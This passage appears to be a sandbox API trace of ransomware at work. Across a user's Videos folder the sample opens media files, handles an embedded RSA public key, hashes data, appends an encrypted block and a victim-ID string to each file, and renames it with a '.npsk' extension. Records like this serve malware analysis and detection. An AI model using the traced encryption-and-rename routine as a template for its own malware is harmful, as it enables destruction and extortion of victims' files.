Ptr=0x3a92af8, Size=0x218) returned 0x3a8b1c8 [0216.104] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0xf0f2, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0216.104] WriteFile (in: hFile=0x61c, lpBuffer=0x3217e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x3217e98*, lpNumberOfBytesWritten=0x397fb50*=0x100, lpOverlapped=0x0) returned 1 [0216.104] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0216.104] WriteFile (in: hFile=0x61c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x397fb50*=0x26, lpOverlapped=0x0) returned 1 [0216.104] CloseHandle (hObject=0x61c) returned 1 [0216.106] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\j2myeAitBN1SML.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\j2myeaitbn1sml.avi"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\j2myeAitBN1SML.avi.npsk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\j2myeaitbn1sml.avi.npsk")) returned 1 [0216.108] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3230c6c0, ftCreationTime.dwHighDateTime=0x1d5e6ee, ftLastAccessTime.dwLowDateTime=0x9fff07f0, ftLastAccessTime.dwHighDateTime=0x1d5e344, ftLastWriteTime.dwLowDateTime=0x9fff07f0, ftLastWriteTime.dwHighDateTime=0x1d5e344, nFileSizeHigh=0x0, nFileSizeLow=0x179d6, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="JPzjkROW.mp4", cAlternateFileName="")) returned 1 [0216.108] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\JPzjkROW.mp4") returned=".mp4" [0216.108] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\JPzjkROW.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\jpzjkrow.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x61c [0216.109] GetFileSizeEx (in: hFile=0x61c, lpFileSize=0x397fb40 | out: lpFileSize=0x397fb40*=96726) returned 1 [0216.109] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3810000 [0216.111] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x179b0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0216.111] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x397fb78, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb78*=0x26, lpOverlapped=0x0) returned 1 [0216.113] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x397fb70, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb70*=0x179d6, lpOverlapped=0x0) returned 1 [0216.114] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0216.114] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0216.114] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0216.114] CryptAcquireContextW (in: phProv=0x397fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x397fa50*=0x7b1f90) returned 1 [0216.115] CryptCreateHash (in: hProv=0x7b1f90, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x397fa58 | out: phHash=0x397fa58) returned 1 [0216.115] CryptHashData (hHash=0x3277d68, pbData=0x7a79b8, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0216.115] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x0, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x397fa54) returned 1 [0216.115] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x32728a8, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x32728a8, pdwDataLen=0x397fa54) returned 1 [0216.115] GetLastError () returned 0x0 [0216.116] CryptDestroyHash (hHash=0x3277d68) returned 1 [0216.116] CryptReleaseContext (hProv=0x7b1f90, dwFlags=0x0) returned 1 [0216.116] UuidCreate (in: Uuid=0x397fa48 | out: Uuid=0x397fa48) returned 0x0 [0216.116] UuidToStringA (in: Uuid=0x397fa48, StringUuid=0x397fa40 | out: StringUuid=0x397fa40) returned 0x0 [0216.116] RpcStringFreeA (in: String=0x397fa40 | out: String=0x397fa40) returned 0x0 [0216.116] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x3a92af8, Size=0x218) returned 0x3a8b1c8 [0216.117] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x179d6, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0216.117] WriteFile (in: hFile=0x61c, lpBuffer=0x3217e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x3217e98*, lpNumberOfBytesWritten=0x397fb50*=0x100, lpOverlapped=0x0) returned 1 [0216.117] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0216.117] WriteFile (in: hFile=0x61c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x397fb50*=0x26, lpOverlapped=0x0) returned 1 [0216.118] CloseHandle (hObject=0x61c) returned 1 [0216.120] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\JPzjkROW.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\jpzjkrow.mp4"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\JPzjkROW.mp4.npsk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\jpzjkrow.mp4.npsk")) returned 1 [0216.121] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe6699f00, ftCreationTime.dwHighDateTime=0x1d5e107, ftLastAccessTime.dwLowDateTime=0x78dc9df0, ftLastAccessTime.dwHighDateTime=0x1d5de4d, ftLastWriteTime.dwLowDateTime=0x78dc9df0, ftLastWriteTime.dwHighDateTime=0x1d5de4d, nFileSizeHigh=0x0, nFileSizeLow=0xf896, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="kHbbaUBy.mp4", cAlternateFileName="")) returned 1 [0216.121] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\kHbbaUBy.mp4") returned=".mp4" [0216.121] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\kHbbaUBy.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\khbbauby.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x61c [0216.122] GetFileSizeEx (in: hFile=0x61c, lpFileSize=0x397fb40 | out: lpFileSize=0x397fb40*=63638) returned 1 [0216.122] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3810000 [0216.123] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0xf870, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0216.124] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x397fb78, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb78*=0x26, lpOverlapped=0x0) returned 1 [0216.126] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x397fb70, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb70*=0xf896, lpOverlapped=0x0) returned 1 [0216.127] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0216.127] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0216.127] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0216.127] CryptAcquireContextW (in: phProv=0x397fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x397fa50*=0x7b1f90) returned 1 [0216.128] CryptCreateHash (in: hProv=0x7b1f90, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x397fa58 | out: phHash=0x397fa58) returned 1 [0216.128] CryptHashData (hHash=0x3277d68, pbData=0x7a79b8, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0216.128] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x0, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x397fa54) returned 1 [0216.128] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x32728a8, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x32728a8, pdwDataLen=0x397fa54) returned 1 [0216.128] GetLastError () returned 0x0 [0216.128] CryptDestroyHash (hHash=0x3277d68) returned 1 [0216.128] CryptReleaseContext (hProv=0x7b1f90, dwFlags=0x0) returned 1 [0216.128] UuidCreate (in: Uuid=0x397fa48 | out: Uuid=0x397fa48) returned 0x0 [0216.128] UuidToStringA (in: Uuid=0x397fa48, StringUuid=0x397fa40 | out: StringUuid=0x397fa40) returned 0x0 [0216.128] RpcStringFreeA (in: String=0x397fa40 | out: String=0x397fa40) returned 0x0 [0216.129] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x3a92af8, Size=0x218) returned 0x3a8b1c8 [0216.129] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0xf896, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0216.129] WriteFile (in: hFile=0x61c, lpBuffer=0x3217e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x3217e98*, lpNumberOfBytesWritten=0x397fb50*=0x100, lpOverlapped=0x0) returned 1 [0216.129] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0216.130] WriteFile (in: hFile=0x61c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x397fb50*=0x26, lpOverlapped=0x0) returned 1 [0216.130] CloseHandle (hObject=0x61c) returned 1 [0216.131] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\kHbbaUBy.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\khbbauby.mp4"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\kHbbaUBy.mp4.npsk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\khbbauby.mp4.npsk")) returned 1 [0216.132] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9f470100, ftCreationTime.dwHighDateTime=0x1d5e7c2, ftLastAccessTime.dwLowDateTime=0x4a448480, ftLastAccessTime.dwHighDateTime=0x1d5da79, ftLastWriteTime.dwLowDateTime=0x4a448480, ftLastWriteTime.dwHighDateTime=0x1d5da79, nFileSizeHigh=0x0, nFileSizeLow=0x6f22, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="kQK4q857gBZQpPL7.mkv", cAlternateFileName="KQK4Q8~1.MKV")) returned 1 [0216.132] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\kQK4q857gBZQpPL7.mkv") returned=".mkv" [0216.132] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\kQK4q857gBZQpPL7.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\kqk4q857gbzqppl7.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x61c [0216.133] GetFileSizeEx (in: hFile=0x61c, lpFileSize=0x397fb40 | out: lpFileSize=0x397fb40*=28450) returned 1 [0216.133] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3810000 [0216.134] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x6efc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0216.134] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x397fb78, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb78*=0x26, lpOverlapped=0x0) returned 1 [0216.136] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x397fb70, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb70*=0x6f22, lpOverlapped=0x0) returned 1 [0216.136] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0216.136] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0216.136] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0216.136] CryptAcquireContextW (in: phProv=0x397fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x397fa50*=0x7b2018) returned 1 [0216.137] CryptCreateHash (in: hProv=0x7b2018, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x397fa58 | out: phHash=0x397fa58) returned 1 [0216.137] CryptHashData (hHash=0x3277d68, pbData=0x7a79b8, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0216.137] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x0, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x397fa54) returned 1 [0216.137] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x32728a8, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x32728a8, pdwDataLen=0x397fa54) returned 1 [0216.137] GetLastError () returned 0x0 [0216.137] CryptDestroyHash (hHash=0x3277d68) returned 1 [0216.137] CryptReleaseContext (hProv=0x7b2018, dwFlags=0x0) returned 1 [0216.138] UuidCreate (in: Uuid=0x397fa48 | out: Uuid=0x397fa48) returned 0x0 [0216.138] UuidToStringA (in: Uuid=0x397fa48, StringUuid=0x397fa40 | out: StringUuid=0x397fa40) returned 0x0 [0216.138] RpcStringFreeA (in: String=0x397fa40 | out: String=0x397fa40) returned 0x0 [0216.138] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x3a92af8, Size=0x218) returned 0x3a8b1c8 [0216.138] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x6f22, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0216.138] WriteFile (in: hFile=0x61c, lpBuffer=0x3217e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x3217e98*, lpNumberOfBytesWritten=0x397fb50*=0x100, lpOverlapped=0x0) returned 1 [0216.139] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0216.139] WriteFile (in: hFile=0x61c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x397fb50*=0x26, lpOverlapped=0x0) returned 1 [0216.139] CloseHandle (hObject=0x61c) returned 1 [0216.140] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\kQK4q857gBZQpPL7.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\kqk4q857gbzqppl7.mkv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\kQK4q857gBZQpPL7.mkv.npsk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\kqk4q857gbzqppl7.mkv.npsk")) returned 1 [0216.141] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8b789490, ftCreationTime.dwHighDateTime=0x1d5e1a0, ftLastAccessTime.dwLowDateTime=0xce30ae80, ftLastAccessTime.dwHighDateTime=0x1d5d85e, ftLastWriteTime.dwLowDateTime=0xce30ae80, ftLastWriteTime.dwHighDateTime=0x1d5d85e, nFileSizeHigh=0x0, nFileSizeLow=0x1688b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="lxZOp9a3-tLAfUP65SfR.avi", cAlternateFileName="LXZOP9~1.AVI")) returned 1 [0216.141] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\lxZOp9a3-tLAfUP65SfR.avi") returned=".avi" [0216.141] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\lxZOp9a3-tLAfUP65SfR.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\lxzop9a3-tlafup65sfr.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x61c [0216.142] GetFileSizeEx (in: hFile=0x61c, lpFileSize=0x397fb40 | out: lpFileSize=0x397fb40*=92299) returned 1 [0216.142] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3810000 [0216.143] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x16865, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0216.143] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x397fb78, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb78*=0x26, lpOverlapped=0x0) returned 1 [0216.145] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x397fb70, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb70*=0x1688b, lpOverlapped=0x0) returned 1 [0216.146] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0216.146] lstrlenA (lpString="-----BEGIN PUBLIC 